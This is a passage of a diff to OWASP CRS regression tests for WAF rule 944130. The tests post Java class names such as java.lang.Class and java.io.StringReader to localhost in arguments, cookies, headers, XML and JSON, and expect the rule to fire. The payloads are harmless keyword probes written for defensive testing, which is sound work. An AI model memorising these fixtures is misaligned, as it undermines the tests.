"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_id: 262 desc: "Content-Type text/plain includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.StringReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-263 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_id: 263 desc: "Content-Type application/json arg value includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.StringReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 
944130-264 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.StringReader\"}" + output: + log_contains: "id \"944130\"" + - test_id: 264 desc: "Content-Type application/json arg name includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.StringReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-265 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.StringReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 265 desc: "Argument test includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Class" - output: - log_contains: "id \"944130\"" - - test_title: 944130-266 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_id: 266 desc: "Argument name includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Class=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-267 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Class=test" + output: + log_contains: "id \"944130\"" + - test_id: 267 desc: "Cookie test includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Class - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-268 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Class + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 268 desc: "Cookie name includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Class=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-269 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Class=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id 
\"944130\"" + - test_id: 269 desc: "Request header test includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Class - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-270 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Class + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 270 desc: "XML attribute value includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-271 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 271 desc: "XML element value includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Class" - output: - log_contains: "id \"944130\"" - - test_title: 944130-272 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_id: 272 desc: "Nested XML element value includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Class" - output: - log_contains: "id \"944130\"" - - test_title: 944130-273 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_id: 273 desc: "Content-Type text/plain includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Class" - output: - log_contains: "id \"944130\"" - - test_title: 944130-274 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_id: 274 desc: "Content-Type application/json arg value includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Class\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-275 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Class\"}" + output: + log_contains: "id \"944130\"" + - test_id: 275 desc: "Content-Type application/json arg name includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Class\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-276 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Class\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 276 desc: "Argument test includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Integer" - output: - log_contains: "id \"944130\"" - - 
test_title: 944130-277 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_id: 277 desc: "Argument name includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Integer=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-278 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Integer=test" + output: + log_contains: "id \"944130\"" + - test_id: 278 desc: "Cookie test includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/x-www-form-urlencoded" - Cookie: test=java.lang.Integer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-279 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Integer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 279 desc: "Cookie name includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Integer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-280 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Integer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 280 desc: "Request header test includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Integer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-281 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Integer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 281 desc: "XML attribute value includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-282 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 282 desc: "XML 
element value includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Integer" - output: - log_contains: "id \"944130\"" - - test_title: 944130-283 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_id: 283 desc: "Nested XML element value includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Integer" - output: - log_contains: "id \"944130\"" - - test_title: 944130-284 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: 
"java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_id: 284 desc: "Content-Type text/plain includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Integer" - output: - log_contains: "id \"944130\"" - - test_title: 944130-285 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_id: 285 desc: "Content-Type application/json arg value includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Integer\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-286 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Integer\"}" + output: + log_contains: "id \"944130\"" + - test_id: 286 desc: "Content-Type application/json arg name includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Integer\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-287 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Integer\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 287 desc: "Argument test includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Number" - output: - log_contains: "id \"944130\"" - - test_title: 944130-288 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_id: 288 desc: "Argument name includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Number=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-289 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Number=test" + output: + log_contains: "id \"944130\"" + - test_id: 289 desc: "Cookie test includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Number - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id 
